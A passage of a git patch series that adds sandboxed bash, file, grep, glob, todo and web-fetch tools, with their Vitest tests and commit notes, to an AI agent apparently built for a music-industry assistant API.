+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "curl example.com" }, {
+      experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
+    } as never);
+    const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record<string, string> };
+    expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" });
+  });
+
+  it("returns the detached commandId when called with detached:true", async () => {
+    const sandbox = makeSandbox({
+      execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: baseContext,
+    } as never)) as { success: boolean; stdout: string };
+    expect(result.success).toBe(true);
+    expect(result.stdout).toMatch(/cmd-123/);
+    expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono");
+  });
+
+  it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => {
+    const sandbox = makeSandbox({ execDetached: undefined });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: baseContext,
+    } as never)) as { success: boolean; stderr: string };
+    expect(result.success).toBe(false);
+    expect(result.stderr).toMatch(/detached mode is not supported/i);
+  });
+
+  it("does NOT inject env vars on detached execs", async () => {
+    const sandbox = makeSandbox({
+      execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+
+    const tool = bashTool();
+    await tool.execute!({ command: "npm run dev", detached: true }, {
+      experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
+    } as never);
+    // execDetached signature is (command, cwd) — no env arg.
+    expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2);
+  });
+});
diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
new file mode 100644
index 000000000..3422fd662
--- /dev/null
+++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts
@@ -0,0 +1,31 @@
+import { describe, it, expect } from "vitest";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+
+const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" };
+
+describe("buildRecoupExecEnv", () => {
+  it("returns undefined when no context", () => {
+    expect(buildRecoupExecEnv(undefined)).toBeUndefined();
+    expect(buildRecoupExecEnv(null)).toBeUndefined();
+    expect(buildRecoupExecEnv("not-a-context")).toBeUndefined();
+  });
+
+  it("returns undefined when context has no recoupOrgId", () => {
+    expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined();
+  });
+
+  it("injects RECOUP_ORG_ID when present in context", () => {
+    const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" });
+    expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" });
+  });
+
+  it("ignores empty-string recoupOrgId", () => {
+    const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" });
+    expect(env).toBeUndefined();
+  });
+
+  it("returns undefined when the input is not a valid AgentContext shape", () => {
+    expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined();
+    expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined();
+  });
+});
diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts
new file mode 100644
index 000000000..a14122f81
--- /dev/null
+++ b/lib/agent/tools/__tests__/getSandbox.test.ts
@@ -0,0 +1,39 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("getSandbox", () => {
+  it("reconnects via connectVercel(state) and returns the sandbox", async () => {
+    const fakeSandbox = { workingDirectory: "/sandbox/mono" };
+    vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never);
+    const state = { sandboxName: "session-xyz" };
+    const result = await getSandbox(
+      { sandbox: { state, workingDirectory: "/sandbox/mono" } },
+      "bash",
+    );
+    expect(result).toBe(fakeSandbox);
+    expect(connectVercel).toHaveBeenCalledWith(state);
+  });
+
+  it("throws a descriptive error when context is missing entirely", async () => {
+    await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/);
+  });
+
+  it("throws when sandbox.state is missing", async () => {
+    await expect(
+      getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"),
+    ).rejects.toThrow(/Sandbox state missing/);
+  });
+
+  it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => {
+    await expect(
+      getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"),
+    ).rejects.toThrow(/Sandbox state missing/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts
new file mode 100644
index 000000000..29ad4f29d
--- /dev/null
+++ b/lib/agent/tools/__tests__/isAgentContext.test.ts
@@ -0,0 +1,42 @@
+import { describe, it, expect } from "vitest";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+describe("isAgentContext", () => {
+  it("returns true for a well-formed context", () => {
+    expect(
+      isAgentContext({
+        sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+      }),
+    ).toBe(true);
+  });
+
+  it("returns false for non-object inputs", () => {
+    expect(isAgentContext(undefined)).toBe(false);
+    expect(isAgentContext(null)).toBe(false);
+    expect(isAgentContext("nope")).toBe(false);
+    expect(isAgentContext(42)).toBe(false);
+  });
+
+  it("returns false when sandbox is missing", () => {
+    expect(isAgentContext({})).toBe(false);
+  });
+
+  it("returns false when sandbox is null", () => {
+    expect(isAgentContext({ sandbox: null })).toBe(false);
+  });
+
+  it("returns false when sandbox is empty (missing state and workingDirectory)", () => {
+    expect(isAgentContext({ sandbox: {} })).toBe(false);
+  });
+
+  it("returns false when sandbox.state is missing or null", () => {
+    expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false);
+  });
+
+  it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => {
+    expect(isAgentContext({ sandbox: { state: {} } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false);
+  });
+});
diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts
new file mode 100644
index 000000000..908113812
--- /dev/null
+++ b/lib/agent/tools/bashTool.ts
@@ -0,0 +1,116 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+
+const TIMEOUT_MS = 120_000;
+
+const bashInputSchema = z.object({
+  command: z.string().describe("The bash command to execute"),
+  cwd: z
+    .string()
+    .optional()
+    .describe("Workspace-relative working directory for the command (e.g., apps/web)"),
+  detached: z
+    .boolean()
+    .optional()
+    .describe(
+      "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). The command starts and returns immediately without waiting for it to finish.",
+    ),
+});
+
+/**
+ * Factory for the `bash` sandbox tool. Runs `bash -c "<command>"` inside
+ * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's
+ * working directory.
+ *
+ * Approval gating is intentionally absent — model-issued commands are
+ * trusted in this PR. Add a host-side gate at the route/UI layer if that
+ * changes.
+ *
+ * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the
+ * sandbox is org-scoped) so future `recoup-api` skill calls can scope to
+ * the right org. Detached execs deliberately skip env injection — those
+ * processes outlive the prompt.
+ */
+export const bashTool = () =>
+  tool({
+    description: `Execute a bash command in the user's shell (non-interactive).
+
+WHEN TO USE:
+- Running existing project commands (build, test, lint, typecheck)
+- Using read-only CLI tools (git status, git diff, ls, etc.)
+- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task
+
+WHEN NOT TO USE:
+- Reading files (use the file read tool instead, once available)
+- Editing or creating files (use file edit/write tools, once available)
+- Searching code or text (use grep / glob tools, once available)
+- Interactive commands (shells, editors, REPLs)
+
+USAGE:
+- Runs bash -c "<command>" in a non-interactive shell (no TTY/PTY)
+- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&"
+- Use the cwd parameter ONLY with a workspace-relative subdirectory
+- Commands automatically timeout after ~2 minutes
+- Combined stdout/stderr output is truncated after ~50,000 characters
+
+IMPORTANT:
+- Never chain commands with ';' or '&&' — use separate tool calls
+- Never use interactive commands (vim, nano, top, bash, ssh, etc.)
+- Always quote file paths that may contain spaces
+- Use detached: true to start dev servers / long-running processes in the background`,
+    inputSchema: bashInputSchema,
+    execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
+      const sandbox = await getSandbox(experimental_context, "bash");
+      const workingDirectory = sandbox.workingDirectory;
+      const workingDir = cwd
+        ? path.isAbsolute(cwd)
+          ? cwd
+          : path.resolve(workingDirectory, cwd)
+        : workingDirectory;
+
+      if (detached) {
+        if (!sandbox.execDetached) {
+          return {
+            success: false,
+            exitCode: null,
+            stdout: "",
+            stderr:
+              "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
+          };
+        }
+        try {
+          const { commandId } = await sandbox.execDetached(command, workingDir);
+          return {
+            success: true,
+            exitCode: null,
+            stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
+            stderr: "",
+          };
+        } catch (error) {
+          return {
+            success: false,
+            exitCode: null,
+            stdout: "",
+            stderr: error instanceof Error ? error.message : String(error),
+          };
+        }
+      }
+
+      const recoupEnv = buildRecoupExecEnv(experimental_context);
+      const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
+        signal: abortSignal,
+        ...(recoupEnv ? { env: recoupEnv } : {}),
+      });
+
+      return {
+        success: result.success,
+        exitCode: result.exitCode,
+        stdout: result.stdout,
+        stderr: result.stderr,
+        ...(result.truncated && { truncated: true }),
+      };
+    },
+  });
diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts
new file mode 100644
index 000000000..6eaf3015f
--- /dev/null
+++ b/lib/agent/tools/buildRecoupExecEnv.ts
@@ -0,0 +1,30 @@
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Build a per-invocation env override carrying Recoupable sandbox context
+ * so outbound shell commands (curl, scripts, the `recoup-api` skill) can
+ * scope requests correctly without any state persisting on the sandbox.
+ *
+ * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token
+ * injection is deliberately NOT included here; a long-lived api key in the
+ * sandbox env would be readable by any model-issued bash command. Proper
+ * short-lived token minting will land alongside the `skill` tool port
+ * (when there's an actual consumer for it).
+ *
+ * `isAgentContext` checks only the `sandbox` fields, so `recoupOrgId` is
+ * validated here: any value that is not a non-empty string is ignored.
+ * @param experimental_context - The opaque context object passed by AI SDK to tool execute.
+ * @returns The env override, or `undefined` when nothing can be injected.
+ */
+export function buildRecoupExecEnv(
+  experimental_context: unknown,
+): Record<string, string> | undefined {
+  if (!isAgentContext(experimental_context)) return undefined;
+
+  // Widen to `unknown`: the guard's narrowing is not a runtime check of this field.
+  const orgId: unknown = experimental_context.recoupOrgId;
+  const env: Record<string, string> = {};
+  if (typeof orgId === "string" && orgId.length > 0) env.RECOUP_ORG_ID = orgId;
+
+  return Object.keys(env).length > 0 ? env : undefined;
+}
diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts
new file mode 100644
index 000000000..be6c46605
--- /dev/null
+++ b/lib/agent/tools/getSandbox.ts
@@ -0,0 +1,28 @@
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Turn the tool-call `experimental_context` into a connected `Sandbox`.
+ * Every call reconnects through `connectVercel(state)` and nothing is cached
+ * on the context: workflow durability requires side-effecting resources
+ * (sandbox sessions) to be re-acquired inside the step that uses them.
+ *
+ * @param experimental_context - The opaque context object passed by AI SDK to tool execute.
+ * @param toolName - Optional tool name to surface in error messages.
+ * @throws Error when the context fails the `isAgentContext` check.
+ */
+export async function getSandbox(
+  experimental_context: unknown,
+  toolName?: string,
+): Promise<Sandbox> {
+  if (isAgentContext(experimental_context)) {
+    return connectVercel(experimental_context.sandbox.state);
+  }
+
+  const toolSuffix = toolName ? ` (tool: ${toolName})` : "";
+  const hint =
+    "Ensure the workflow start payload includes `sandbox.state` and that " +
+    "runAgentStep threads it via experimental_context.";
+  throw new Error(`Sandbox state missing from agent context${toolSuffix}. ${hint}`);
+}
diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts
new file mode 100644
index 000000000..0049ac010
--- /dev/null
+++ b/lib/agent/tools/isAgentContext.ts
@@ -0,0 +1,26 @@
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
+
+/**
+ * Runtime type guard for the `experimental_context` value handed to tool
+ * `execute` callbacks. Accepts only objects whose `sandbox` property is a
+ * non-null object carrying a non-null object `state` and a non-empty string
+ * `workingDirectory`; everything else is rejected. Checking every required
+ * leaf means `{ sandbox: null }` and `{ sandbox: {} }` fail here rather than
+ * surfacing later as a property read on `undefined` inside a tool.
+ *
+ * @param value - The opaque context object passed by AI SDK to tool execute.
+ * @returns `true` when `value` has the required `sandbox` fields.
+ */
+export function isAgentContext(value: unknown): value is AgentContext {
+  if (value === null || typeof value !== "object") return false;
+
+  const { sandbox } = value as { sandbox?: unknown };
+  if (sandbox === null || typeof sandbox !== "object") return false;
+
+  // Both leaves are required; an empty workingDirectory counts as missing.
+  const { state, workingDirectory } = sandbox as { state?: unknown; workingDirectory?: unknown };
+  const hasState = state !== null && typeof state === "object";
+  const hasWorkingDirectory = typeof workingDirectory === "string" && workingDirectory.length > 0;
+
+  return hasState && hasWorkingDirectory;
+}
diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts
index 7c2c9407b..e4bc4fc56 100644
--- a/lib/agents/generalAgent/getGeneralAgent.ts
+++ b/lib/agents/generalAgent/getGeneralAgent.ts
@@ -1,4 +1,5 @@
-import { stepCountIs, ToolLoopAgent } from "ai";
+import { ToolLoopAgent } from "ai";
+import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { AnthropicProviderOptions } from "@ai-sdk/anthropic";
 import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google";
 import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai";
@@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise<Ro
 
   const tools = await setupToolsForRequest(body);
   const model = bodyModel || DEFAULT_MODEL;
-  const stopWhen = stepCountIs(111);
+  const stopWhen = CHAT_AGENT_STOP_WHEN;
 
   const agent = new ToolLoopAgent({
     model,
diff --git a/lib/chat/const.ts b/lib/chat/const.ts
index 0ff8cbd2b..54daa63d4 100644
--- a/lib/chat/const.ts
+++ b/lib/chat/const.ts
@@ -1,5 +1,18 @@
+import { stepCountIs } from "ai";
+
 export const MAX_MESSAGES = 55;
 
+/**
+ * Stop condition for multi-step chat agent loops (model → tool → model → …).
+ * Used by /api/chat (via getGeneralAgent) and /api/chat/workflow (via
+ * runAgentStep). 111 is high enough that normal flows never hit the cap
+ * but bounds runaway loops for cost / replay safety.
+ *
+ * Single-shot agents (compact, content, email-reply) use `stepCountIs(1)`
+ * directly — they're not in the multi-step family.
+ */
+export const CHAT_AGENT_STOP_WHEN = stepCountIs(111);
+
 export const SYSTEM_PROMPT = `You are Recoup, a friendly, sharp, and strategic AI assistant for the music industry. You help music executives, artist teams, and self-starting artists analyze fan data, optimize marketing, and grow artist careers.
 
 ---
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index dcaad8585..6ceb0c867 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -13,6 +13,9 @@ import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
 import { errorResponse } from "@/lib/networking/errorResponse";
 import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
 import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
+import { extractOrgId } from "@/lib/recoupable/extractOrgId";
+import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants";
+import type { VercelState } from "@/lib/sandbox/vercel/state";
 import generateUUID from "@/lib/uuid/generateUUID";
 
 const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
@@ -84,12 +87,29 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   void persistLatestUserMessage(validated.chatId, validated.messages as never);
 
   const modelId = chat.model_id ?? DEFAULT_MODEL_ID;
+  const recoupOrgId = session.clone_url
+    ? (extractOrgId(session.clone_url) ?? undefined)
+    : undefined;
   const run = await start(runAgentWorkflow, [
     {
       messages: validated.messages,
       chatId: validated.chatId,
       sessionId: validated.sessionId,
       modelId,
+      agentContext: {
+        sandbox: {
+          state: session.sandbox_state as VercelState,
+          // Slim PR 4 ships the default working directory. Per-session
+          // overrides land when createChatRuntime is ported alongside
+          // the rest of the tool surface.
+          workingDirectory: DEFAULT_WORKING_DIRECTORY,
+        },
+        recoupOrgId,
+        // No `recoupAccessToken`: handing the long-lived api key to bash
+        // would let any model-issued command exfiltrate it via env. Proper
+        // short-lived token minting lands alongside the `skill` tool port
+        // (when there's an actual consumer for it).
+      },
     },
   ]);
 

From 51fd649945376a0d0cc4a87a3c172ae91f528d0e Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 13:49:12 -0500
Subject: [PATCH 04/10] =?UTF-8?q?feat(chat-workflow):=20port=207=20leaf=20?=
 =?UTF-8?q?sandbox=20tools=20=E2=80=94=20read/write/edit/grep=E2=80=A6=20(?=
 =?UTF-8?q?#585)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman's single-responsibility (SRP) convention):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — single-quote escaping for shell arguments (`'` → `'\''`)
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 lib/agent/__tests__/buildAgentTools.test.ts   |  34 +++-
 lib/agent/buildAgentTools.ts                  |  29 ++-
 lib/agent/tools/__tests__/bashTool.test.ts    |  14 +-
 .../tools/__tests__/editFileTool.test.ts      |  86 +++++++++
 lib/agent/tools/__tests__/globTool.test.ts    |  97 ++++++++++
 lib/agent/tools/__tests__/grepTool.test.ts    | 103 +++++++++++
 .../tools/__tests__/readFileTool.test.ts      |  89 ++++++++++
 lib/agent/tools/__tests__/shellEscape.test.ts |  20 +++
 .../tools/__tests__/toDisplayPath.test.ts     |  29 +++
 .../tools/__tests__/todoWriteTool.test.ts     |  28 +++
 .../tools/__tests__/webFetchTool.test.ts      |  96 ++++++++++
 .../tools/__tests__/writeFileTool.test.ts     |  52 ++++++
 lib/agent/tools/bashTool.ts                   | 109 ++++++------
 lib/agent/tools/editFileTool.ts               | 100 +++++++++++
 lib/agent/tools/globTool.ts                   | 165 ++++++++++++++++++
 lib/agent/tools/grepTool.ts                   | 143 +++++++++++++++
 lib/agent/tools/readFileTool.ts               |  70 ++++++++
 lib/agent/tools/shellEscape.ts                |  14 ++
 lib/agent/tools/toDisplayPath.ts              |  34 ++++
 lib/agent/tools/todoWriteTool.ts              |  65 +++++++
 lib/agent/tools/webFetchTool.ts               | 124 +++++++++++++
 lib/agent/tools/writeFileTool.ts              |  65 +++++++
 22 files changed, 1491 insertions(+), 75 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/editFileTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/globTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/grepTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/readFileTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/shellEscape.test.ts
 create mode 100644 lib/agent/tools/__tests__/toDisplayPath.test.ts
 create mode 100644 lib/agent/tools/__tests__/todoWriteTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/webFetchTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/writeFileTool.test.ts
 create mode 100644 lib/agent/tools/editFileTool.ts
 create mode 100644 lib/agent/tools/globTool.ts
 create mode 100644 lib/agent/tools/grepTool.ts
 create mode 100644 lib/agent/tools/readFileTool.ts
 create mode 100644 lib/agent/tools/shellEscape.ts
 create mode 100644 lib/agent/tools/toDisplayPath.ts
 create mode 100644 lib/agent/tools/todoWriteTool.ts
 create mode 100644 lib/agent/tools/webFetchTool.ts
 create mode 100644 lib/agent/tools/writeFileTool.ts

diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index 52479cad0..5478c59ca 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,17 +1,35 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
+const EXPECTED_TOOL_NAMES = [
+  "bash",
+  "read",
+  "write",
+  "edit",
+  "grep",
+  "glob",
+  "todo_write",
+  "web_fetch",
+] as const;
+
 describe("buildAgentTools", () => {
-  it("returns a tools record keyed by tool name", () => {
+  it("returns a tools record with all 8 leaf tools registered", () => {
     const tools = buildAgentTools();
-    expect(tools).toHaveProperty("bash");
-    expect(typeof tools.bash).toBe("object");
+    for (const name of EXPECTED_TOOL_NAMES) {
+      expect(tools).toHaveProperty(name);
+    }
   });
 
-  it("each tool has an inputSchema, description, and execute", () => {
-    const tools = buildAgentTools();
-    expect(tools.bash.inputSchema).toBeDefined();
-    expect(tools.bash.description).toBeDefined();
-    expect(typeof tools.bash.execute).toBe("function");
+  it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
+    const tools = buildAgentTools() as Record<
+      string,
+      { description?: unknown; inputSchema?: unknown; execute?: unknown }
+    >;
+    for (const name of EXPECTED_TOOL_NAMES) {
+      const t = tools[name]!;
+      expect(typeof t.description).toBe("string");
+      expect(t.inputSchema).toBeDefined();
+      expect(typeof t.execute).toBe("function");
+    }
   });
 });
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index be6bde085..f9cbc2b39 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -1,4 +1,11 @@
 import { bashTool } from "@/lib/agent/tools/bashTool";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { globTool } from "@/lib/agent/tools/globTool";
+import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
+import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
 
 /**
  * Factory for the full agent tool set passed into `streamText({ tools })`.
@@ -6,14 +13,26 @@ import { bashTool } from "@/lib/agent/tools/bashTool";
  * at execute time — the factory takes no arguments because the tools are
  * stateless modulo that context.
  *
- * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`,
- * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`,
- * `fetch`) port in follow-up PRs and slot into this record one-by-one
- * without changing the factory signature.
+ * Currently ships 8 leaf tools:
+ *   - bash, read, write, edit, grep, glob (sandbox / file ops)
+ *   - todo_write (planning surface; stateless, echoes the list back)
+ *   - web_fetch (HTTP via curl inside the sandbox)
+ *
+ * Composite tools (`task` subagent, `ask_user_question` UI part, and
+ * `skill` discovery) will be ported in a follow-up PR — they depend on
+ * subagent context plumbing, UI rendering, and skill-discovery infra
+ * that does not exist in this API codebase yet.
  */
 export function buildAgentTools() {
   return {
-    bash: bashTool(),
+    bash: bashTool,
+    read: readFileTool,
+    write: writeFileTool,
+    edit: editFileTool,
+    grep: grepTool,
+    glob: globTool,
+    todo_write: todoWriteTool,
+    web_fetch: webFetchTool,
   };
 }
 
diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts
index da9a999d3..568a7f72d 100644
--- a/lib/agent/tools/__tests__/bashTool.test.ts
+++ b/lib/agent/tools/__tests__/bashTool.test.ts
@@ -34,7 +34,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = await tool.execute!({ command: "ls" }, {
       experimental_context: baseContext,
     } as never);
@@ -64,7 +64,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "find ." }, {
       experimental_context: baseContext,
     } as never)) as { truncated?: boolean };
@@ -83,7 +83,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "ls", cwd: "apps/web" }, {
       experimental_context: baseContext,
     } as never);
@@ -107,7 +107,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "curl example.com" }, {
       experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
     } as never);
@@ -121,7 +121,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: baseContext,
     } as never)) as { success: boolean; stdout: string };
@@ -134,7 +134,7 @@ describe("bashTool.execute", () => {
     const sandbox = makeSandbox({ execDetached: undefined });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: baseContext,
     } as never)) as { success: boolean; stderr: string };
@@ -148,7 +148,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
     } as never);
diff --git a/lib/agent/tools/__tests__/editFileTool.test.ts b/lib/agent/tools/__tests__/editFileTool.test.ts
new file mode 100644
index 000000000..3a2cac81d
--- /dev/null
+++ b/lib/agent/tools/__tests__/editFileTool.test.ts
@@ -0,0 +1,86 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
